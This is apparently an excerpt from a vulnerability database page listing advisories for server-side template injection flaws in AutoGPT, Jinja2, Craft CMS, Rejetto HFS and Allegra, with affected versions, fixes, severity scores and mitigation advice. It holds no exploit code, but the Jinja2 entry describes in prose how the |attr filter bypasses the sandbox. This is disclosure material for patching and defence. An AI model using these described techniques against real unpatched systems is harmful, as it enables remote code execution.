    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-03-20T10:15:53Z",
    "severity": "HIGH"
  },
  "details": "AutoGPT versions 0.3.4 and earlier are vulnerable to a Server-Side Template Injection (SSTI) that could lead to Remote Code Execution (RCE). The vulnerability arises from the improper handling of user-supplied format strings in the `AgentOutputBlock` implementation, where malicious input is passed to the Jinja2 templating engine without adequate security measures. Attackers can exploit this flaw to execute arbitrary commands on the host system. The issue is fixed in version 0.4.0.",
  "id": "GHSA-cjjc-mf84-xp9f",
  "modified": "2025-03-20T12:32:52Z",
  "published": "2025-03-20T12:32:52Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1040"
    },
    {
      "type": "WEB",
      "url": "https://github.com/significant-gravitas/autogpt/commit/6dba31e0215549604bdcc1aed24e3a1714e75ee2"
    },
    {
      "type": "WEB",
      "url": "https://huntr.com/bounties/b74ef75f-61d5-4422-ab15-9550c8b4f185"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-CPWX-VRP4-4PQ7

Vulnerability from github – Published: 2025-03-05 20:40 – Updated: 2025-11-03 22:54
VLAI
Summary
Jinja2 vulnerable to sandbox breakout through attr filter selecting format method
Details

An oversight in how the Jinja sandboxed environment interacts with the |attr filter allows an attacker that controls the content of a template to execute arbitrary Python code.

To exploit the vulnerability, an attacker needs to control the content of a template. Whether that is the case depends on the type of application using Jinja. This vulnerability impacts users of applications which execute untrusted templates.

Jinja's sandbox does catch calls to str.format and ensures they don't escape the sandbox. However, it's possible to use the |attr filter to get a reference to a string's plain format method, bypassing the sandbox. After the fix, the |attr filter no longer bypasses the environment's attribute lookup.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.1.5"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "Jinja2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.1.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-27516"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1336"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-03-05T20:40:14Z",
    "nvd_published_at": "2025-03-05T21:15:20Z",
    "severity": "MODERATE"
  },
  "details": "An oversight in how the Jinja sandboxed environment interacts with the `|attr` filter allows an attacker that controls the content of a template to execute arbitrary Python code.\n\nTo exploit the vulnerability, an attacker needs to control the content of a template. Whether that is the case depends on the type of application using Jinja. This vulnerability impacts users of applications which execute untrusted templates.\n\nJinja\u0027s sandbox does catch calls to `str.format` and ensures they don\u0027t escape the sandbox. However, it\u0027s possible to use the `|attr` filter to get a reference to a string\u0027s plain format method, bypassing the sandbox. After the fix, the `|attr` filter no longer bypasses the environment\u0027s attribute lookup.",
  "id": "GHSA-cpwx-vrp4-4pq7",
  "modified": "2025-11-03T22:54:41Z",
  "published": "2025-03-05T20:40:14Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/pallets/jinja/security/advisories/GHSA-cpwx-vrp4-4pq7"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-27516"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pallets/jinja/commit/90457bbf33b8662926ae65cdde4c4c32e756e403"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/pallets/jinja"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2025/04/msg00022.html"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2025/04/msg00045.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Jinja2 vulnerable to sandbox breakout through attr filter selecting format method"
}

GHSA-CRCQ-738G-PQVC

Vulnerability from github – Published: 2025-08-25 20:42 – Updated: 2025-11-27 07:57
VLAI
Summary
Craft CMS Potential Remote Code Execution via Twig SSTI
Details

Note that users must have administrator access to the Craft Control Panel, and allowAdminChanges must be enabled for this to work, which is against Craft CMS' recommendations for any non-dev environment.

https://craftcms.com/knowledge-base/securing-craft#set-allowAdminChanges-to-false-in-production

Note: This is a follow-up to GHSA-f3cw-hg6r-chfv

Users should update to the patched versions (4.16.6 and 5.8.7) to mitigate the issue.

Resources: https://github.com/craftcms/cms/pull/17612

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 4.16.5"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "craftcms/cms"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.0.0-RC1"
            },
            {
              "fixed": "4.16.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 5.8.6"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "craftcms/cms"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.0.0-RC1"
            },
            {
              "fixed": "5.8.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-57811"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1336",
      "CWE-22",
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-08-25T20:42:45Z",
    "nvd_published_at": "2025-08-25T18:15:31Z",
    "severity": "MODERATE"
  },
  "details": "Note that users must have administrator access to the Craft Control Panel, and [allowAdminChanges](https://craftcms.com/docs/5.x/reference/config/general.html#allowadminchanges) must be enabled for this to work, which is against Craft CMS\u0027 recommendations for any non-dev environment.\n\nhttps://craftcms.com/knowledge-base/securing-craft#set-allowAdminChanges-to-false-in-production\n\nNote: This is a follow-up to [GHSA-f3cw-hg6r-chfv](https://github.com/craftcms/cms/security/advisories/GHSA-f3cw-hg6r-chfv)\n\nUsers should update to the patched versions (4.16.6 and 5.8.7) to mitigate the issue.\n\nResources: https://github.com/craftcms/cms/pull/17612",
  "id": "GHSA-crcq-738g-pqvc",
  "modified": "2025-11-27T07:57:45Z",
  "published": "2025-08-25T20:42:45Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/craftcms/cms/security/advisories/GHSA-crcq-738g-pqvc"
    },
    {
      "type": "WEB",
      "url": "https://github.com/craftcms/cms/security/advisories/GHSA-f3cw-hg6r-chfv"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-57811"
    },
    {
      "type": "WEB",
      "url": "https://github.com/craftcms/cms/pull/17612"
    },
    {
      "type": "WEB",
      "url": "https://github.com/craftcms/cms/commit/e77f8a287dcdda41f1724f525d03542f18566cbc"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/craftcms/cms"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Craft CMS Potential Remote Code Execution via Twig SSTI"
}

GHSA-CW5C-XM7F-WX63

Vulnerability from github – Published: 2024-05-31 12:30 – Updated: 2025-10-22 00:33
VLAI
Details

Rejetto HTTP File Server, up to and including version 2.3m, is vulnerable to a template injection vulnerability. This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request. As of the CVE assignment date, Rejetto HFS 2.3m is no longer supported.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-23692"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1336",
      "CWE-94"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-05-31T10:15:09Z",
    "severity": "CRITICAL"
  },
  "details": "Rejetto HTTP File Server, up to and including version 2.3m, is vulnerable to a template injection vulnerability. This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request. As of the CVE assignment date, Rejetto HFS 2.3m is no longer supported.",
  "id": "GHSA-cw5c-xm7f-wx63",
  "modified": "2025-10-22T00:33:03Z",
  "published": "2024-05-31T12:30:49Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23692"
    },
    {
      "type": "WEB",
      "url": "https://github.com/rapid7/metasploit-framework/pull/19240"
    },
    {
      "type": "WEB",
      "url": "https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce"
    },
    {
      "type": "WEB",
      "url": "https://vulncheck.com/advisories/rejetto-unauth-rce"
    },
    {
      "type": "WEB",
      "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-23692"
    },
    {
      "type": "WEB",
      "url": "https://www.vicarius.io/vsociety/posts/cve-2024-23692-detect-rejetto-hfs-vulnerability"
    },
    {
      "type": "WEB",
      "url": "https://www.vicarius.io/vsociety/posts/cve-2024-23692-rejetto-hfs-mitigate-vulnerability"
    },
    {
      "type": "WEB",
      "url": "https://www.vicarius.io/vsociety/posts/unauthenticated-rce-flaw-in-rejetto-http-file-server-cve-2024-23692"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-CWGV-JWGM-R5F5

Vulnerability from github – Published: 2024-11-22 21:32 – Updated: 2024-11-22 21:32
VLAI
Details

Allegra getLinkText Server-Side Template Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Allegra. Authentication is required to exploit this vulnerability.

The specific flaw exists within the implementation of getLinkText method. The issue results from the lack of proper validation of a user-supplied string before processing it with the template engine. An attacker can leverage this vulnerability to execute code in the context of LOCAL SERVICE. Was ZDI-CAN-23609.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-30372"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1336"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-11-22T20:15:08Z",
    "severity": "HIGH"
  },
  "details": "Allegra getLinkText Server-Side Template Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Allegra. Authentication is required to exploit this vulnerability.\n\nThe specific flaw exists within the implementation of getLinkText method. The issue results from the lack of proper validation of a user-supplied string before processing it with the template engine. An attacker can leverage this vulnerability to execute code in the context of LOCAL SERVICE. Was ZDI-CAN-23609.",
  "id": "GHSA-cwgv-jwgm-r5f5",
  "modified": "2024-11-22T21:32:16Z",
  "published": "2024-11-22T21:32:16Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30372"
    },
    {
      "type": "WEB",
      "url": "https://alltena.com/en/resources/release-notes/relnotes-7-5-2"
    },
    {
      "type": "WEB",
      "url": "https://www.zerodayinitiative.com/advisories/ZDI-24-1165"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Architecture and Design

Choose a template engine that offers a sandbox or restricted mode, or at least limits the power of any available expressions, function calls, or commands.

Mitigation
Implementation

Use the template engine's sandbox or restricted mode, if available.

No CAPEC attack patterns related to this CWE.